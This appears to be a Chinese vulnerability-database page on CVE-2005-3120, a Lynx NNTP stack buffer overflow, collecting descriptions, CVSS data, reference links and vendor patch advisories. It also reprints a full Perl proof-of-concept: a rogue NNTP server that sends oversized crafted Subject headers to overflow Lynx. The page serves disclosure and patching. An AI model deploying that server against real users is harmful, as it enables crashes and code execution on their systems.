CVE-2005-3120
CVSS7.5
发布时间 :2005-10-17 16:06:00
修订时间 :2010-08-21 00:33:11
NMCOEPS    

[原文]Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certain article headers containing Asian characters that cause Lynx to add extra escape (ESC) characters.


[CNNVD]Lynx NNTP文章首部处理缓冲区溢出漏洞(CNNVD-200510-130)

        Lynx是一个基于文本的WWW浏览器。它不能够显示图像或Java句柄,所以执行速度非常快。
        Lynx在处理某些畸形的NNTP文章首部时存在缓冲区溢出,成功利用这个漏洞的攻击者可以完全控制EIP、EBX、EBP、ESI和EDI,导致在目标系统中执行任意代码。当Lynx连接到NNTP服务器获取新闻组中的文章时,会用某些文章首部的信息调用HTrjis()函数。该函数将缺失的ESC字符添加到某些数据以支持亚洲字符组。但是,函数没有检查是否将字符写到了字符数组缓冲区之外,导致栈溢出。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_kansas:lynx:2.8.3
cpe:/a:university_of_kansas:lynx:2.8.6
cpe:/a:university_of_kansas:lynx:2.8.4
cpe:/a:university_of_kansas:lynx:2.8.6_dev13

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9257Stack-based buffer overflow in the HTrjis function in Lynx 2.8.6 and earlier allows remote NNTP servers to execute arbitrary code via certai...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3120
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-130
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
(VENDOR_ADVISORY)  FULLDISC  20051017 Lynx Remote Buffer Overflow
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170253
(VENDOR_ADVISORY)  MISC  https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=170253
http://www.redhat.com/support/errata/RHSA-2005-803.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2005:803
http://www.ubuntulinux.org/support/documentation/usn/usn-206-1
(UNKNOWN)  UBUNTU  USN-206-1
http://www.securityfocus.com/bid/15117
(UNKNOWN)  BID  15117
http://www.securityfocus.com/archive/1/archive/1/435689/30/4740/threaded
(UNKNOWN)  BUGTRAQ  20060602 Re: [SECURITY] [DSA 1085-1] New lynx-cur packages fix several vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/419763/100/0/threaded
(UNKNOWN)  FEDORA  FLSA:152832
http://www.openpkg.org/security/OpenPKG-SA-2005.026-lynx.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2005.026
http://www.novell.com/linux/security/advisories/2005_25_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:025
http://www.mandriva.com/security/advisories?name=MDKSA-2005:186
(UNKNOWN)  MANDRIVA  MDKSA-2005:186
http://www.gentoo.org/security/en/glsa/glsa-200510-15.xml
(UNKNOWN)  GENTOO  GLSA-200510-15
http://www.debian.org/security/2006/dsa-1085
(UNKNOWN)  DEBIAN  DSA-1085
http://www.debian.org/security/2005/dsa-876
(UNKNOWN)  DEBIAN  DSA-876
http://www.debian.org/security/2005/dsa-874
(UNKNOWN)  DEBIAN  DSA-874
http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm
http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056
(UNKNOWN)  SLACKWARE  SSA:2005-310-03
http://securitytracker.com/id?1015065
(UNKNOWN)  SECTRACK  1015065
http://secunia.com/advisories/20383
(UNKNOWN)  SECUNIA  20383
http://secunia.com/advisories/18584
(UNKNOWN)  SECUNIA  18584
http://secunia.com/advisories/18376
(UNKNOWN)  SECUNIA  18376
http://secunia.com/advisories/17480
(UNKNOWN)  SECUNIA  17480
http://secunia.com/advisories/17445
(UNKNOWN)  SECUNIA  17445
http://secunia.com/advisories/17444
(UNKNOWN)  SECUNIA  17444
http://secunia.com/advisories/17360
(UNKNOWN)  SECUNIA  17360
http://secunia.com/advisories/17340
(UNKNOWN)  SECUNIA  17340
http://secunia.com/advisories/17248
(UNKNOWN)  SECUNIA  17248
http://secunia.com/advisories/17238
(UNKNOWN)  SECUNIA  17238
http://secunia.com/advisories/17231
(UNKNOWN)  SECUNIA  17231
http://secunia.com/advisories/17230
(UNKNOWN)  SECUNIA  17230
http://secunia.com/advisories/17216
(UNKNOWN)  SECUNIA  17216
http://secunia.com/advisories/17150
(UNKNOWN)  SECUNIA  17150
http://lists.trustix.org/pipermail/tsl-announce/2005-October/000354.html
(UNKNOWN)  TRUSTIX  TSLSA-2005-0059
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47/SCOSA-2005.47.txt
(UNKNOWN)  SCO  SCOSA-2005.47
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.7/SCOSA-2006.7.txt
(UNKNOWN)  SCO  SCOSA-2006.7

- 漏洞信息

Lynx NNTP文章首部处理缓冲区溢出漏洞
高危 缓冲区溢出
2005-10-17 00:00:00 2005-11-02 00:00:00
远程  
        Lynx是一个基于文本的WWW浏览器。它不能够显示图像或Java句柄,所以执行速度非常快。
        Lynx在处理某些畸形的NNTP文章首部时存在缓冲区溢出,成功利用这个漏洞的攻击者可以完全控制EIP、EBX、EBP、ESI和EDI,导致在目标系统中执行任意代码。当Lynx连接到NNTP服务器获取新闻组中的文章时,会用某些文章首部的信息调用HTrjis()函数。该函数将缺失的ESC字符添加到某些数据以支持亚洲字符组。但是,函数没有检查是否将字符写到了字符数组缓冲区之外,导致栈溢出。

- 公告与补丁

        暂无数据

- 漏洞信息 (1256)

Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC) (EDBID:1256)
multiple dos
2005-10-17 Verified
0 Ulf Harnhammar
N/A [点击下载]
#!/usr/bin/perl --

# lynx-nntp-server
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.

use strict;
use IO::Socket;

$main::port = 119;
$main::timeout = 5;

# *** SUBROUTINES ***

sub mysend($$)
{
my $file = shift;
my $str = shift;

print $file "$str\n";
print "SENT: $str\n";
} # sub mysend

sub myreceive($)
{
my $file = shift;
my $inp;

eval
{
local $SIG{ALRM} = sub { die "alarm\n" };
alarm $main::timeout;
$inp = <$file>;
alarm 0;
};

if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; }
$inp =~ tr/\015\012\000//d;
print "RECEIVED: $inp\n";
$inp;
} # sub myreceive

# *** MAIN PROGRAM ***

{
my $server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => $main::port,
Listen => SOMAXCONN,
Reuse => 1);
die "can't set up server!\n" unless $server;


while (my $client = $server->accept())
{
$client->autoflush(1);
print 'connection from '.$client->peerhost."\n";


mysend($client, '200 Internet News');
my $group = 'alt.angst';

while (my $str = myreceive($client))
{
if ($str =~ m/^mode reader$/i)
{
mysend($client, '200 Internet News');
next;
}

if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i)
{
$group = $1;
mysend($client, "211 1 1 1 $group");
next;
}

if ($str =~ m/^quit$/i)
{
mysend($client, '205 Goodbye');
last;
}

if ($str =~ m/^head ([0-9]+)$/i)
{
my $evil = '$@UU(JUU' x 21; # Edit the number!
$evil .= 'U' x (504 - length $evil);

my $head = <<HERE;
221 $1 <xyzzy\@usenet.qx>
Path: host!someotherhost!onemorehost
From: <mr_talkative\@usenet.qx>
Subject: $evil
Newsgroup: $group
Message-ID: <xyzzy\@usenet.qx>
.
HERE

$head =~ s|\s+$||s;
mysend($client, $head);
next;
}

mysend($client, '500 Syntax Error');
} # while str=myreceive(client)

close $client;
print "closed\n\n\n";
} # while client=server->accept()
}

# milw0rm.com [2005-10-17]
		

- 漏洞信息 (F41407)

SCOSA-2005.47.txt (PacketStormID:F41407)
2005-11-09 00:00:00
SCO  sco.com
advisory,web,overflow,arbitrary,protocol
CVE-2005-3120
[点击下载]

SCO Security Advisory - Ulf Harnhammar has reported a vulnerability in Lynx, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the HTrjis() function in the handling of article headers sent from NNTP (Network News Transfer Protocol) servers. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into visiting a malicious web site which redirects to a malicious NNTP server via the nntp: URI handler. Successful exploitation allows execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

 			SCO Security Advisory

Subject:		UnixWare 7.1.3 UnixWare 7.1.4 : Lynx NNTP Buffer Overflow Vulnerability
Advisory number: 	SCOSA-2005.47
Issue date: 		2005 November 08
Cross reference:	fz533159
 			CVE-2005-3120
______________________________________________________________________________


1. Problem Description

 	Ulf Harnhammar has reported a vulnerability in Lynx, which can
 	be exploited by malicious people to compromise a user's system.

 	The vulnerability is caused due to a boundary error in the
 	"HTrjis()" function in the handling of article headers sent from
 	NNTP (Network News Transfer Protocol) servers. This can be
 	exploited to cause a stack-based buffer overflow by e.g.
 	tricking a user into visiting a malicious web site which
 	redirects to a malicious NNTP server via the "nntp:" URI
 	handler.

 	Successful exploitation allows execution of arbitrary code.

 	The Common Vulnerabilities and Exposures project (cve.mitre.org)
 	has assigned the name CVE-2005-3120 to this issue.


2. Vulnerable Supported Versions

 	System				Binaries
 	----------------------------------------------------------------------
 	UnixWare 7.1.3			/usr/gnu/bin/lynx
 	UnixWare 7.1.4			/usr/gnu/bin/lynx


3. Solution

 	The proper solution is to install the latest packages.


4. UnixWare 7.1.3

 	4.1 Location of Fixed Binaries

 	ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47


 	4.2 Verification

 	MD5 (p533159.image) = bc3fd8c36aea096b7ed75a2f27950b1e

 	md5 is available for download from
 		ftp://ftp.sco.com/pub/security/tools


 	4.3 Installing Fixed Binaries

 	Upgrade the affected binaries with the following sequence:

 	Download p533159.image to the /var/spool/pkg directory

 	# pkgadd -d /var/spool/pkg/p533159.image


5. UnixWare 7.1.4

 	5.1 Location of Fixed Binaries

 	ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47


 	5.2 Verification

 	MD5 (p533159.image) = bc3fd8c36aea096b7ed75a2f27950b1e

 	md5 is available for download from
 		ftp://ftp.sco.com/pub/security/tools


 	5.3 Installing Fixed Binaries

 	Upgrade the affected binaries with the following sequence:

 	Download p533159.image to the /var/spool/pkg directory

 	# pkgadd -d /var/spool/pkg/p533159.image


6. References

 	Specific references for this advisory:
 		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120
 		http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html
 		http://securitytracker.com/id?1015065
 		http://secunia.com/advisories/17216

 	SCO security resources:
 		http://www.sco.com/support/security/index.html

 	SCO security advisories via email
 		http://www.sco.com/support/forums/security.html

 	This security fix closes SCO incident fz533159.


7. Disclaimer

 	SCO is not responsible for the misuse of any of the information
 	we provide on this website and/or through our security
 	advisories. Our advisories are a service to our customers
 	intended to promote secure installation and use of SCO
 	products.


8. Acknowledgments

 	SCO would like to thank Ulf Harnhammar for reporting this
 	vulnerability.

______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (UnixWare)

iD8DBQFDcPYVaqoBO7ipriERAjoRAJ0U1Ik6iVjuCU2XFRAAiJ1k157D8gCeOXw6
+lnmbCl8lvRH/GYwLg2saLE=
=g4hZ
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F41051)

Debian Linux Security Advisory 876-1 (PacketStormID:F41051)
2005-10-30 00:00:00
Debian  security.debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2005-3120
[点击下载]

Debian Security Advisory DSA 876-1 - Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode browser for the WWW that can be remotely exploited. During the handling of Asian characters when connecting to an NNTP server lynx can be tricked to write past the boundary of a buffer which can lead to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 876-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 27th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : lynx-ssl
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3120

Ulf H    

- 漏洞信息 (F41047)

Debian Linux Security Advisory 874-1 (PacketStormID:F41047)
2005-10-30 00:00:00
Debian  security.debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2005-3120
[点击下载]

Debian Security Advisory DSA 874-1 - Ulf Harnhammar discovered a buffer overflow in lynx, a text-mode browser for the WWW that can be remotely exploited. During the handling of Asian characters when connecting to an NNTP server lynx can be tricked to write past the boundary of a buffer which can lead to the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 874-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
October 27th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : lynx
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2005-3120

Ulf H    

- 漏洞信息 (F40776)

usn-206-1.txt (PacketStormID:F40776)
2005-10-18 00:00:00
Martin Pitt  security.ubuntu.com
advisory,remote,overflow,arbitrary
linux,ubuntu
CVE-2005-3120
[点击下载]

Ubuntu Security Notice USN-206-1 - Ulf Harnhammar discovered a remote vulnerability in Lynx when connecting to a news server (NNTP). The function that added missing escape chararacters to article headers did not check the size of the target buffer. Specially crafted news entries could trigger a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the user running lynx. In order to exploit this, the user is not even required to actively visit a news site with Lynx since a malicious HTML page could automatically redirect to an nntp:// URL with malicious news items.

===========================================================
Ubuntu Security Notice USN-206-1	   October 17, 2005
lynx vulnerability
CAN-2005-3120
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

lynx

The problem can be corrected by upgrading the affected package to
version 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for
Ubuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Ulf Harnhammar discovered a remote vulnerability in Lynx when
connecting to a news server (NNTP). The function that added missing
escape chararacters to article headers did not check the size of the
target buffer. Specially crafted news entries could trigger a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the user running lynx. In order to exploit this, the
user is not even required to actively visit a news site with Lynx
since a malicious HTML page could automatically redirect to an nntp://
URL with malicious news items.


Updated packages for Ubuntu 4.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz
      Size/MD5:    17668 c5251ad9cead60e416cf21a461371877
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc
      Size/MD5:      620 4b4310912f7f76fe01cf8312707be244
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb
      Size/MD5:  1882872 8be361fa3eead1e76cbbf2426c255c8b

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb
      Size/MD5:  1833368 d481856973186dd5d432e1102c49a917

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb
      Size/MD5:  1878484 1496a6331a4666295bd89703e509037a

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz
      Size/MD5:    18015 6171994c6c8f67d84267aa69d00ba292
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc
      Size/MD5:      626 08ff9f5a955222f051e4e78101ef7c40
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb
      Size/MD5:  1881886 74bc70c3731c903e69fd74eb0a6d2d68

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb
      Size/MD5:  1832038 f2e333289856566f93f19ca8fd0c5dfd

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb
      Size/MD5:  1878380 6440d4eae5fadef31aaf21c5396ef401

Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz
      Size/MD5:    18015 0f7b6e508094dabd59bee9018b368523
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc
      Size/MD5:      626 2a90195b05000a7f318eb04386d1ad1c
    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz
      Size/MD5:  2984352 5f516a10596bd52c677f9bfd9579bc28

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb
      Size/MD5:  1901120 c2e0da03f20b892aaea81d0f0588f7b1

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb
      Size/MD5:  1833214 7c021c0b0667d3aedc8479579d52e5ad

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb
      Size/MD5:  1881080 5ef72d193817f616e99f01113f6053dd
    

- 漏洞信息 (F40774)

Mandriva Linux Security Advisory 2005.186 (PacketStormID:F40774)
2005-10-18 00:00:00
Mandriva  mandriva.com
advisory,remote,overflow
linux,mandriva
CVE-2005-3120
[点击下载]

Mandriva Linux Security Update Advisory - Ulf Harnhammar discovered a remote buffer overflow in lynx versions 2.8.2 through 2.8.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

                Mandriva Linux Security Update Advisory
 _______________________________________________________________________

 Package name:           lynx
 Advisory ID:            MDKSA-2005:186
 Date:                   October 17th, 2005

 Affected versions:	 10.1, 10.2, 2006.0, Corporate 3.0,
			 Corporate Server 2.1,
			 Multi Network Firewall 2.0
 ______________________________________________________________________

 Problem Description:

 Ulf Harnhammar discovered a remote buffer overflow in lynx versions
 2.8.2 through 2.8.5.
 
 When Lynx connects to an NNTP server to fetch information about the
 available articles in a newsgroup, it will call a function called
 HTrjis() with the information from certain article headers. The
 function adds missing ESC characters to certain data, to support
 Asian character sets. However, it does not check if it writes outside
 of the char array buf, and that causes a remote stack-based buffer
 overflow, with full control over EIP, EBX, EBP, ESI and EDI.                    
                                                                                 
 Two attack vectors to make a victim visit a URL to a dangerous news
 server are: (a) *redirecting scripts*, where the victim visits some
 web page and it redirects automatically to a malicious URL, and
 (b) *links in web pages*, where the victim visits some web page
 and selects a link on the page to a malicious URL. Attack vector
 (b) is helped by the fact that Lynx does not automatically display
 where links lead to, unlike many graphical web browsers.                 
 
 The updated packages have been patched to address this issue.
 _______________________________________________________________________

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120
 ______________________________________________________________________

 Updated Packages:
  
 Mandrivalinux 10.1:
 03a47f29118c2291a3bf9a355273560c  10.1/RPMS/lynx-2.8.5-1.1.101mdk.i586.rpm
 0e7e4cd9c64861a7d0a284fb6b9be9e3  10.1/SRPMS/lynx-2.8.5-1.1.101mdk.src.rpm

 Mandrivalinux 10.1/X86_64:
 657c0cd7d9226c5b1f8b57c19e72f657  x86_64/10.1/RPMS/lynx-2.8.5-1.1.101mdk.x86_64.rpm
 0e7e4cd9c64861a7d0a284fb6b9be9e3  x86_64/10.1/SRPMS/lynx-2.8.5-1.1.101mdk.src.rpm

 Mandrivalinux 10.2:
 e81251fccbdd21bdaebd963e6e2ed1d2  10.2/RPMS/lynx-2.8.5-1.1.102mdk.i586.rpm
 6e5cceb1a9bdf36e7f8eab2ecc08799f  10.2/SRPMS/lynx-2.8.5-1.1.102mdk.src.rpm

 Mandrivalinux 10.2/X86_64:
 411f4dc65bf8c58a55a92cdb3be9ef53  x86_64/10.2/RPMS/lynx-2.8.5-1.1.102mdk.x86_64.rpm
 6e5cceb1a9bdf36e7f8eab2ecc08799f  x86_64/10.2/SRPMS/lynx-2.8.5-1.1.102mdk.src.rpm

 Mandrivalinux 2006.0:
 ee92cfae1cce73b8084cf6ad2c6d1381  2006.0/RPMS/lynx-2.8.5-4.1.20060mdk.i586.rpm
 a022a76a884e198cf4f331a4d71c7d20  2006.0/SRPMS/lynx-2.8.5-4.1.20060mdk.src.rpm

 Mandrivalinux 2006.0/X86_64:
 46833e32f2c958d8fb544654efd4ab83  x86_64/2006.0/RPMS/lynx-2.8.5-4.1.20060mdk.x86_64.rpm
 a022a76a884e198cf4f331a4d71c7d20  x86_64/2006.0/SRPMS/lynx-2.8.5-4.1.20060mdk.src.rpm

 Multi Network Firewall 2.0:
 f43a161be8fb6049d3f2361b5ead799a  mnf/2.0/RPMS/lynx-2.8.5-1.1.M20mdk.i586.rpm
 570c3679d4d38e62c21e570ab37f5bfe  mnf/2.0/SRPMS/lynx-2.8.5-1.1.M20mdk.src.rpm

 Corporate Server 2.1:
 b18b5f89f3a8389362a9f67acfb87a2c  corporate/2.1/RPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.i586.rpm
 3d6af86d010f884152fd30f7fdd0bcb9  corporate/2.1/SRPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.src.rpm

 Corporate Server 2.1/X86_64:
 d4e5c0107a09cef8d142ca666d049303  x86_64/corporate/2.1/RPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.x86_64.rpm
 3d6af86d010f884152fd30f7fdd0bcb9  x86_64/corporate/2.1/SRPMS/lynx-2.8.5-0.10.2.C21mdk.dev.8.src.rpm

 Corporate 3.0:
 970bef84ca43e8855569efad58455c47  corporate/3.0/RPMS/lynx-2.8.5-1.1.C30mdk.i586.rpm
 c456757c4be351906911fc7827ffb348  corporate/3.0/SRPMS/lynx-2.8.5-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 5df091387574a783a1a9cae4008f7dcb  x86_64/corporate/3.0/RPMS/lynx-2.8.5-1.1.C30mdk.x86_64.rpm
 c456757c4be351906911fc7827ffb348  x86_64/corporate/3.0/SRPMS/lynx-2.8.5-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDVNlzmqjQ0CJFipgRAiK/AKDjzBUwzaHQMJdid4dk85XnzAyFRQCgukjX
uETiVPPn6yJFpJUZwhcA1oo=
=6SF+
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F40771)

Gentoo Linux Security Advisory 200510-15 (PacketStormID:F40771)
2005-10-18 00:00:00
Gentoo  security.gentoo.org
advisory,overflow
linux,gentoo
CVE-2005-3120
[点击下载]

Gentoo Linux Security Advisory GLSA 200510-15 - When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters. Versions less than 2.8.5-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200510-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Lynx: Buffer overflow in NNTP processing
      Date: October 17, 2005
      Bugs: #108451
        ID: 200510-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Lynx contains a buffer overflow that may be exploited to execute
arbitrary code.

Background
==========

Lynx is a text-mode browser for the World Wide Web. It supports
multiple URL types, including HTTP and NNTP URLs.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  www-client/lynx     < 2.8.5-r1                        >= 2.8.5-r1

Description
===========

When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves
information about the available articles in the target newsgroup. Ulf
Harnhammar discovered a buffer overflow in a function that handles the
escaping of special characters.

Impact
======

An attacker could setup a malicious NNTP server and entice a user to
access it using Lynx (either by creating NNTP links on a web page or by
forcing a redirect for Lynx users). The data returned by the NNTP
server would trigger the buffer overflow and execute arbitrary code
with the rights of the user running Lynx.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Lynx users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/lynx-2.8.5-r1"

References
==========

  [ 1 ] CAN-2005-3120
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3120

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息

20019
Lynx NNTP HTrjis() Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-10-17 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Lynx NNTP Article Header Buffer Overflow Vulnerability
Boundary Condition Error 15117
Yes No
2005-10-17 12:00:00 2006-11-28 05:35:00
Discovery is credited to Ulf Harnhammar.

- 受影响的程序版本

University of Kansas Lynx 2.8.6 dev9
University of Kansas Lynx 2.8.6 dev8
University of Kansas Lynx 2.8.6 dev7
University of Kansas Lynx 2.8.6 dev6
University of Kansas Lynx 2.8.6 dev5
University of Kansas Lynx 2.8.6 dev4
University of Kansas Lynx 2.8.6 dev3
University of Kansas Lynx 2.8.6 dev2
University of Kansas Lynx 2.8.6 dev13
University of Kansas Lynx 2.8.6 dev12
University of Kansas Lynx 2.8.6 dev11
University of Kansas Lynx 2.8.6 dev10
University of Kansas Lynx 2.8.6 dev1
University of Kansas Lynx 2.8.5 dev.8
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
University of Kansas Lynx 2.8.5 dev.5
University of Kansas Lynx 2.8.5 dev.4
University of Kansas Lynx 2.8.5 dev.3
University of Kansas Lynx 2.8.5 dev.2
University of Kansas Lynx 2.8.5
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 2006.0 x86_64
